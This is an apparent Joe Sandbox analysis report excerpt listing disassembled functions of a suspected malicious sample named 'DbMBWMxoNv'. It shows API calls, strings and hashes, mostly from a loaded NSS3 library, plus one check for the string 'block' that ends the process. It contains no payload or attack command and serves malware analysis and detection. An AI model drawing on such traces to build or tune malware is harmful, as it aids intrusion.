Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
String ID:
API String ID: 4254102231-0
Opcode ID: 8b072944c057c48f9d5b66158aa6379c7b8874c022c841d9fc75350fb6d295ef
Instruction ID: dcc8a8f3f69b205f8f55312e662324ff47674f673ae6b18dabfc0175da41da46
Opcode Fuzzy Hash: 8b072944c057c48f9d5b66158aa6379c7b8874c022c841d9fc75350fb6d295ef
Instruction Fuzzy Hash: 41613BF1900706AFE711DF75D944A67BBE8FF08208B04453AE85AC7B51EB30E924CBA1

Function 6CF74CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CF74CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CF74D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CF74D37

Part of subcall function 6D05D930: PL_strncpyz.NSS3(?,?,?), ref: 6D05D963

PR_LogPrint.NSS3(?,00000000), ref: 6CF74D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CF74D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CF74D8A
PR_LogPrint.NSS3(?,00000000), ref: 6CF74DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CF74DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CF74E20

Strings

C_GetObjectSize, xrefs: 6CF74CEE
(CK_INVALID_HANDLE), xrefs: 6CF74D30, 6CF74D83
*pulSize = 0x%x, xrefs: 6CF74E1B
hSession = 0x%x, xrefs: 6CF74D12, 6CF74D22
pulSize = 0x%p, xrefs: 6CF74DB7
hObject = 0x%x, xrefs: 6CF74D65, 6CF74D75

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
API String ID: 1003633598-3553622718
Opcode ID: 0138f2f81aab83e30104be38bb7f1b5e4f681262865d92b0c594e0b0428fd897
Instruction ID: ea319748b667f782d6c098db3bfcfc1abc1fc3bccb71df0eae92b8a708f700c3
Opcode Fuzzy Hash: 0138f2f81aab83e30104be38bb7f1b5e4f681262865d92b0c594e0b0428fd897
Instruction Fuzzy Hash: A841F872504104AFEB209B25EE98F6E3B75EB5230DF494026FE086B153DB309954CF72

Function 6CF77C90 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Verify), ref: 6CF77CB6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CF77CE4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CF77CF3

Part of subcall function 6D05D930: PL_strncpyz.NSS3(?,?,?), ref: 6D05D963

PR_LogPrint.NSS3(?,00000000), ref: 6CF77D09
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CF77D2A
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CF77D45
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6CF77D5E
PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6CF77D77

Strings

pSignature = 0x%p, xrefs: 6CF77D59
ulSignatureLen = %d, xrefs: 6CF77D72
(CK_INVALID_HANDLE), xrefs: 6CF77CEC
ulDataLen = %d, xrefs: 6CF77D40
hSession = 0x%x, xrefs: 6CF77CCE, 6CF77CDE
pData = 0x%p, xrefs: 6CF77D25
C_Verify, xrefs: 6CF77CB1

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
API String ID: 1003633598-3278097884
Opcode ID: 314c3f0c625c66ed57da515073b74d400436372540473d2d7fc93ba03bdd3d40
Instruction ID: 608bc96d0c74a1455b553ac40097245a8448063817eb0ecd03c10d6ff1dd18f9
Opcode Fuzzy Hash: 314c3f0c625c66ed57da515073b74d400436372540473d2d7fc93ba03bdd3d40
Instruction Fuzzy Hash: 8231E272505105AFEB219B65EE48F6E37B1EB9630CF4D4026F90C67213DB309854CBB1

Function 6D00CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6D00CC7B), ref: 6D00CD7A

Part of subcall function 6D00CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CF7C1A8,?), ref: 6D00CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D00CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D00CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6D00CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D00CD8E

Part of subcall function 6CF305C0: PR_EnterMonitor.NSS3 ref: 6CF305D1
Part of subcall function 6CF305C0: PR_ExitMonitor.NSS3 ref: 6CF305EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6D00CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D00CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D00CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D00CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6D00CE48

Strings

freeaddrinfo, xrefs: 6D00CD9F, 6D00CE10
getnameinfo, xrefs: 6D00CDB2, 6D00CE23
wship6.dll, xrefs: 6D00CDE3
getaddrinfo, xrefs: 6D00CD88, 6D00CDF9
ws2_32.dll, xrefs: 6D00CD75

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: d5626c3e3cba8956f664ac7ff734f28ca383b59dee75a64706679a3e4dbd2c4f
Instruction ID: 3fcaabcfef2d868995331ed6c620f9e61368eb187826e23d34e40f08c3613b8e
Opcode Fuzzy Hash: d5626c3e3cba8956f664ac7ff734f28ca383b59dee75a64706679a3e4dbd2c4f
Instruction Fuzzy Hash: B5119AAAD1156276FB519B766C10BBE39989B1214DF0C113AE80DDA683FB10C544C6FF

Function 6D051C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6D0513BC,?,?,?,6D051193), ref: 6D051C6B
PR_NewLock.NSS3(?,6D051193), ref: 6D051C7E

Part of subcall function 6D0098D0: calloc.MOZGLUE(00000001,00000084,6CF30936,00000001,?,6CF3102C), ref: 6D0098E5

PR_NewCondVar.NSS3(00000000,?,6D051193), ref: 6D051C91

Part of subcall function 6CF2BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CF321BC), ref: 6CF2BB8C

PR_NewCondVar.NSS3(00000000,?,?,6D051193), ref: 6D051CA7

Part of subcall function 6CF2BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CF2BBEB
Part of subcall function 6CF2BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CF2BBFB
Part of subcall function 6CF2BB80: GetLastError.KERNEL32 ref: 6CF2BC03
Part of subcall function 6CF2BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CF2BC19
Part of subcall function 6CF2BB80: free.MOZGLUE(00000000), ref: 6CF2BC22

PR_NewCondVar.NSS3(00000000,?,?,?,6D051193), ref: 6D051CBE
PR_NewCondVar.NSS3(00000000,?,?,?,?,6D051193), ref: 6D051CD4
calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6D051193), ref: 6D051CFE
PR_Lock.NSS3(?,?,?,?,?,?,?,6D051193), ref: 6D051D1A

Part of subcall function 6D009BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CF31A48), ref: 6D009BB3
Part of subcall function 6D009BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CF31A48), ref: 6D009BC8

PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6D051193), ref: 6D051D3D

Part of subcall function 6CFEDD70: TlsGetValue.KERNEL32 ref: 6CFEDD8C
Part of subcall function 6CFEDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CFEDDB4

PR_SetError.NSS3(FFFFE890,00000000,?,6D051193), ref: 6D051D4E
PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6D051193), ref: 6D051D64
PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6D051193), ref: 6D051D6F
PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6D051193), ref: 6D051D7B
PR_DestroyCondVar.NSS3(?,?,?,?,?,6D051193), ref: 6D051D87
PR_DestroyCondVar.NSS3(00000000,?,?,?,6D051193), ref: 6D051D93
PR_DestroyLock.NSS3(00000000,?,?,6D051193), ref: 6D051D9F
free.MOZGLUE(00000000,?,6D051193), ref: 6D051DA8

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
String ID:
API String ID: 3246495057-0
Opcode ID: 1b6a6de12e358ba6066144371f8b46a13739455105e2a8499011888e8a168607
Instruction ID: 6c013ef843a4a1cc3ad06f0e64b3e361d0f67c09e5ed4cdf4737992ee5239e96
Opcode Fuzzy Hash: 1b6a6de12e358ba6066144371f8b46a13739455105e2a8499011888e8a168607
Instruction Fuzzy Hash: 2F31B5F1D00701ABF7219F64AD41B6B7AE4AF05608F084938ED4A8B741FB31E914CBA3

Function 004119F0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 00411A15
ExitProcess.KERNEL32 ref: 00411A21
strtok_s.MSVCRT ref: 00411A38

Strings

block, xrefs: 00411A07

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 874b96f5355ad7fdc669f9348c21a2386c74f496e9fb1aa2ab2ce30486f6077a
Instruction ID: 24cedd258c0b2a3a786e48f87e23423129f016670b7ad46fccbec0895e921d59
Opcode Fuzzy Hash: 874b96f5355ad7fdc669f9348c21a2386c74f496e9fb1aa2ab2ce30486f6077a
Instruction Fuzzy Hash: 00513174B0A109DFCB04DF94D984FEE77B9AF44704F10405AE502AB261E778EA91CB5A

Function 6CFA5CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6CFA5EC0,00000000,?,?), ref: 6CFA5CBE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6CFA5CD7
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CFA5CF0
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CFA5D09
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6CFA5EC0,00000000,?,?), ref: 6CFA5D1F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6CFA5D3C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFA5D51
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFA5D66
PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6CFA5D80

Strings

sql:, xrefs: 6CFA5CD1, 6CFA5D36
dbm:, xrefs: 6CFA5D03, 6CFA5D60
multiaccess:, xrefs: 6CFA5CB8
extern:, xrefs: 6CFA5CEA, 6CFA5D4B
NSS_DEFAULT_DB_TYPE, xrefs: 6CFA5D1A

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: strncmp$SecureStrdup_Util
String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
API String ID: 1171493939-3017051476
Opcode ID: fc526657e4c4f34d91e8cadd8ec51b5c393389b1f66e9d9a812a94387d690c3b
Instruction ID: f06371914b7b9cb394b1f4800a90d7529fe791d3676979c1b9cfc40d6dfac719
Opcode Fuzzy Hash: fc526657e4c4f34d91e8cadd8ec51b5c393389b1f66e9d9a812a94387d690c3b
Instruction Fuzzy Hash: F831D6E1E45751EBFB000BA59C4CB677768AF02348F140030FE5AAA683E7B5D913C299

Function 6CFA6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6D071DE0,?), ref: 6CFA6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFA6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CFA6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6CFA6D82
DER_GetInteger_Util.NSS3(?), ref: 6CFA6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CFA6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CFA6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CFA6F19
PK11_DigestBegin.NSS3(00000000), ref: 6CFA6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6CFA6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CFA7011
PK11_FreeSymKey.NSS3(00000000), ref: 6CFA7033
free.MOZGLUE(?), ref: 6CFA703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CFA7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CFA7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6CFA70AF

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 58ce9826760bfe5f428dddf501624606ebc6aa9991d18c7d3ae634a6aad7a558
Instruction ID: 95954f0a040a7ac644b6e47632fc060f47fe9bea14dbf2b37e1e160e5909138a
Opcode Fuzzy Hash: 58ce9826760bfe5f428dddf501624606ebc6aa9991d18c7d3ae634a6aad7a558
Instruction Fuzzy Hash: F3A10B72915201DBEB008BA8DC85B9BB2A4DB8530CF248939F959CBB81F775D846C793

Function 6CF6AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CF4AB95,00000000,?,00000000,00000000,00000000), ref: 6CF6AF25
EnterCriticalSection.KERNEL32(?,?,?,?,6CF4AB95,00000000,?,00000000,00000000,00000000), ref: 6CF6AF39
PR_Unlock.NSS3(?,?,?,6CF4AB95,00000000,?,00000000,00000000,00000000), ref: 6CF6AF51
PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6CF4AB95,00000000,?,00000000,00000000,00000000), ref: 6CF6AF69
TlsGetValue.KERNEL32 ref: 6CF6B06B
EnterCriticalSection.KERNEL32(?), ref: 6CF6B083
PR_Unlock.NSS3(?), ref: 6CF6B0A4
TlsGetValue.KERNEL32 ref: 6CF6B0C1
EnterCriticalSection.KERNEL32(00000000), ref: 6CF6B0D9
PR_Unlock.NSS3 ref: 6CF6B102
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CF6B151
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CF6B182

Part of subcall function 6CF9FAB0: free.MOZGLUE(?,-00000001,?,?,6CF3F673,00000000,00000000), ref: 6CF9FAC7

PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CF6B177

Part of subcall function 6CFEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CFEC2BF

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6CF4AB95,00000000,?,00000000,00000000,00000000), ref: 6CF6B1A2
PR_GetCurrentThread.NSS3(?,?,?,?,6CF4AB95,00000000,?,00000000,00000000,00000000), ref: 6CF6B1AA
PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6CF4AB95,00000000,?,00000000,00000000,00000000), ref: 6CF6B1C2

Part of subcall function 6CF91560: TlsGetValue.KERNEL32(00000000,?,6CF60844,?), ref: 6CF9157A
Part of subcall function 6CF91560: EnterCriticalSection.KERNEL32(?,?,?,6CF60844,?), ref: 6CF9158F
Part of subcall function 6CF91560: PR_Unlock.NSS3(?,?,?,?,6CF60844,?), ref: 6CF915B2

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
String ID:
API String ID: 4188828017-0
Opcode ID: bda900a821f8165bada860915725fca30bc014cf64f40b939705ee2e97b36da9
Instruction ID: da4df1b4956f56cc5670a9d2835f689c11f4c6b56842d4c218930782c91b241a
Opcode Fuzzy Hash: bda900a821f8165bada860915725fca30bc014cf64f40b939705ee2e97b36da9
Instruction Fuzzy Hash: 82A1B0B1D00205ABEF009F65DC41BEEBBB4FF08308F154525E905ABB52E731E969CBA1

Function 6CFBAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFBADB1

Part of subcall function 6CF9BE30: SECOID_FindOID_Util.NSS3(6CF5311B,00000000,?,6CF5311B,?), ref: 6CF9BE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CFBADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CFBAE08

Part of subcall function 6CF9B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D0718D0,?), ref: 6CF9B095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CFBAE25
PL_FreeArenaPool.NSS3 ref: 6CFBAE63
PR_CallOnce.NSS3(6D0A2AA4,6CFA12D0), ref: 6CFBAE4D

Part of subcall function 6CEC4C70: TlsGetValue.KERNEL32(?,?,?,6CEC3921,6D0A14E4,6D00CC70), ref: 6CEC4C97
Part of subcall function 6CEC4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CEC3921,6D0A14E4,6D00CC70), ref: 6CEC4CB0
Part of subcall function 6CEC4C70: PR_Unlock.NSS3(?,?,?,?,?,6CEC3921,6D0A14E4,6D00CC70), ref: 6CEC4CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFBAE93
PR_CallOnce.NSS3(6D0A2AA4,6CFA12D0), ref: 6CFBAECC
PL_FreeArenaPool.NSS3 ref: 6CFBAEDE
PL_FinishArenaPool.NSS3 ref: 6CFBAEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CFBAEF5
PL_FinishArenaPool.NSS3 ref: 6CFBAF16

Strings

security, xrefs: 6CFBADEE

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: 5ce6064089f88d46d0cb3661a833e8bd53755c23298c7dfbd269cac3c2211aa0
Instruction ID: fd398d31a49e827308ccdbd5198704b668400d2860fda4a32b7ace061baf9007
Opcode Fuzzy Hash: 5ce6064089f88d46d0cb3661a833e8bd53755c23298c7dfbd269cac3c2211aa0
Instruction Fuzzy Hash: 734127B6904200A7FB215B2B9C84BEF72E8AF5270CF540525F814A6F41F7359A18C6E3

Function 6CFD5CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 6CFD2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CFD2A28,00000060,00000001), ref: 6CFD2BF0
Part of subcall function 6CFD2BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CFD2A28,00000060,00000001), ref: 6CFD2C07
Part of subcall function 6CFD2BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6CFD2A28,00000060,00000001), ref: 6CFD2C1E
Part of subcall function 6CFD2BE0: free.MOZGLUE(?,00000000,00000000,?,6CFD2A28,00000060,00000001), ref: 6CFD2C4A

free.MOZGLUE(?,?,6CFDAAD4,?,?,?,?,?,?,?,?,00000000,?,6CFD80C1), ref: 6CFD5D0F
free.MOZGLUE(?,?,?,6CFDAAD4,?,?,?,?,?,?,?,?,00000000,?,6CFD80C1), ref: 6CFD5D4E
free.MOZGLUE(?,?,?,6CFDAAD4,?,?,?,?,?,?,?,?,00000000,?,6CFD80C1), ref: 6CFD5D62
